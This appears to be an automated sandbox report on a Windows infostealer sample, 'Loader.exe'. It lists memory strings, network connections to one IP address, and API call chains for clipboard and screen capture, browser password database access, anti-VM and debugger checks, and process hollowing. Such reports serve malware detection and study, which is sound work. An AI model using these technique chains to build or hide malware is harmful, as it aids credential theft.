            Source: Loader.exe, 00000002.00000003.1763473279.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730936644.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730824420.0000000005D90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: Loader.exe, 00000002.00000003.1730936644.0000000005D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: Loader.exe, 00000002.00000003.1786258773.0000000005D3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
            Source: Loader.exe, 00000002.00000003.1730226994.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730301767.0000000005D7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Loader.exe, 00000002.00000003.1786258773.0000000005D3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: Loader.exe, 00000002.00000003.1730226994.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730301767.0000000005D7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Loader.exe, 00000002.00000003.1785899492.0000000005E5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: Loader.exe, 00000002.00000003.1785899492.0000000005E5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: Loader.exe, 00000002.00000003.1785899492.0000000005E5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: Loader.exe, 00000002.00000003.1785899492.0000000005E5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: Loader.exe, 00000002.00000003.1785899492.0000000005E5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00436300 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00436300
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00436300 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00436300
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004364F0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_004364F0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E5F4D00_2_00E5F4D0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E634D00_2_00E634D0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E615A00_2_00E615A0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E5F9800_2_00E5F980
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E586C00_2_00E586C0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E5CE700_2_00E5CE70
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E5D7F00_2_00E5D7F0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E71FD20_2_00E71FD2
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E4FA2_3_0378E4FA
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E4FA2_3_0378E4FA
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E4FA2_3_0378E4FA
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E4FA2_3_0378E4FA
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043A8602_2_0043A860
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004261432_2_00426143
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00422AFE2_2_00422AFE
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00408BC02_2_00408BC0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043ABD02_2_0043ABD0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043D4202_2_0043D420
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00442C302_2_00442C30
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004244802_2_00424480
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0040E5212_2_0040E521
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0041F5802_2_0041F580
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004435B02_2_004435B0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042EEDD2_2_0042EEDD
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004296802_2_00429680
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00421F602_2_00421F60
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042FF022_2_0042FF02
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004418402_2_00441840
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004078502_2_00407850
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004250502_2_00425050
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0041B02F2_2_0041B02F
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004210D02_2_004210D0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042E8FF2_2_0042E8FF
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042C8952_2_0042C895
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004068A02_2_004068A0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042C8952_2_0042C895
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042F1452_2_0042F145
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004269602_2_00426960
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043B9612_2_0043B961
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004361202_2_00436120
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004419202_2_00441920
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004319372_2_00431937
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004021802_2_00402180
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004099902_2_00409990
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004432602_2_00443260
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0041AA682_2_0041AA68
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042FA7B2_2_0042FA7B
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00429A002_2_00429A00
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043A2102_2_0043A210
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00419A1F2_2_00419A1F
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00430A2D2_2_00430A2D
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042EEDD2_2_0042EEDD
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00423AE02_2_00423AE0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00429AEE2_2_00429AEE
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00426AF02_2_00426AF0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004452882_2_00445288
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042BA9A2_2_0042BA9A
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0041EAA32_2_0041EAA3
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00420B602_2_00420B60
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0041D3272_2_0041D327
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0040B32F2_2_0040B32F
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00402B902_2_00402B90
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043339D2_2_0043339D
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042244F2_2_0042244F
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042AC022_2_0042AC02
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043B4002_2_0043B400
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004204E02_2_004204E0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00441C802_2_00441C80
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043048B2_2_0043048B
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043E4A02_2_0043E4A0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004414B02_2_004414B0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042A4B82_2_0042A4B8
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0040AD402_2_0040AD40
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00406D402_2_00406D40
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00405D302_2_00405D30
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00404D322_2_00404D32
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042B5DE2_2_0042B5DE
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004415E02_2_004415E0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004085F02_2_004085F0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043DD902_2_0043DD90
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004035B02_2_004035B0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0041B6572_2_0041B657
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0040C6722_2_0040C672
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00419E042_2_00419E04
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042AE302_2_0042AE30
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043263C2_2_0043263C
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00435ED02_2_00435ED0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004256D12_2_004256D1
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004414B02_2_004414B0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004267602_2_00426760
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004417602_2_00441760
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042C7782_2_0042C778
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00448F1D2_2_00448F1D
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00442F202_2_00442F20
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004027C02_2_004027C0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00439FB02_2_00439FB0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00E5F9802_2_00E5F980
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00E5F4D02_2_00E5F4D0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00E634D02_2_00E634D0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00E615A02_2_00E615A0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00E586C02_2_00E586C0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00E5CE702_2_00E5CE70
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00E5D7F02_2_00E5D7F0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00E71FD22_2_00E71FD2
            Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00E68178 appears 36 times
            Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00408400 appears 54 times
            Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00E655C0 appears 66 times
            Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00419750 appears 70 times
            Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Loader.exeStatic PE information: Section: .coS ZLIB complexity 1.000329143481717
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@1/1
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043ABD0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_0043ABD0
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
            Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Loader.exe, 00000002.00000003.1730684283.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1731021194.0000000005D35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Loader.exeReversingLabs: Detection: 42%
            Source: Loader.exeVirustotal: Detection: 42%
            Source: C:\Users\user\Desktop\Loader.exeFile read: C:\Users\user\Desktop\Loader.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
            Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
            Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Loader.exeStatic PE information: section name: .00cfg
            Source: Loader.exeStatic PE information: section name: .coS
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E64BC5 push ecx; ret 0_2_00E64BD8
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E47B push edi; retf 2_3_0378E489
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E47B push edi; retf 2_3_0378E489
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E66B push 09006E6Fh; retf 2_3_0378E679
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E66B push 09006E6Fh; retf 2_3_0378E679
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E42A push 00000041h; retf 2_3_0378E439
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E42A push 00000041h; retf 2_3_0378E439
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E50A push 6573764Fh; retf 2_3_0378E519
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E50A push 6573764Fh; retf 2_3_0378E519
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E4AB push ecx; retf 2_3_0378E4B9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E4AB push ecx; retf 2_3_0378E4B9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E6AB push 1F006E6Fh; retf 2_3_0378E6C9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E6AB push 1F006E6Fh; retf 2_3_0378E6C9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E49B push ebx; retf 2_3_0378E4A9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E49B push ebx; retf 2_3_0378E4A9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378C49C push edx; iretd 2_3_0378C4A1
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E48B push ebp; retf 2_3_0378E499
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E48B push ebp; retf 2_3_0378E499
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E47B push edi; retf 2_3_0378E489
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E47B push edi; retf 2_3_0378E489
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E66B push 09006E6Fh; retf 2_3_0378E679
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E66B push 09006E6Fh; retf 2_3_0378E679
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E42A push 00000041h; retf 2_3_0378E439
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E42A push 00000041h; retf 2_3_0378E439
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E50A push 6573764Fh; retf 2_3_0378E519
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E50A push 6573764Fh; retf 2_3_0378E519
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E4AB push ecx; retf 2_3_0378E4B9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E4AB push ecx; retf 2_3_0378E4B9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E6AB push 1F006E6Fh; retf 2_3_0378E6C9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E6AB push 1F006E6Fh; retf 2_3_0378E6C9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_3_0378E49B push ebx; retf 2_3_0378E4A9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E64CA2 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E64CA2
            Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Loader.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\Loader.exe TID: 4500Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Loader.exe TID: 1620Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E6C7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00E6C7DB
            Source: Loader.exe, 00000002.00000003.1813007192.0000000003729000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.1883066535.0000000003729000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW7
            Source: Loader.exe, 00000002.00000002.1883066535.00000000036ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1813007192.0000000003729000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.1883066535.0000000003729000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Loader.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043FE80 LdrInitializeThunk,2_2_0043FE80
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E65444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E65444
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E7B18D mov edi, dword ptr fs:[00000030h]0_2_00E7B18D
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E5CD10 mov eax, dword ptr fs:[00000030h]0_2_00E5CD10
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E5BD50 mov edi, dword ptr fs:[00000030h]0_2_00E5BD50
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00E5BD50 mov edi, dword ptr fs:[00000030h]2_2_00E5BD50
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00E5CD10 mov eax, dword ptr fs:[00000030h]2_2_00E5CD10
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E69F90 GetProcessHeap,0_2_00E69F90
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E65444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E65444
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E65438 SetUnhandledExceptionFilter,0_2_00E65438
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E67DCA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E67DCA
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E64AD9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00E64AD9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00E64AD9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00E64AD9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00E65444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00E65444
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00E65438 SetUnhandledExceptionFilter,2_2_00E65438
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00E67DCA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00E67DCA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E7B18D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00E7B18D
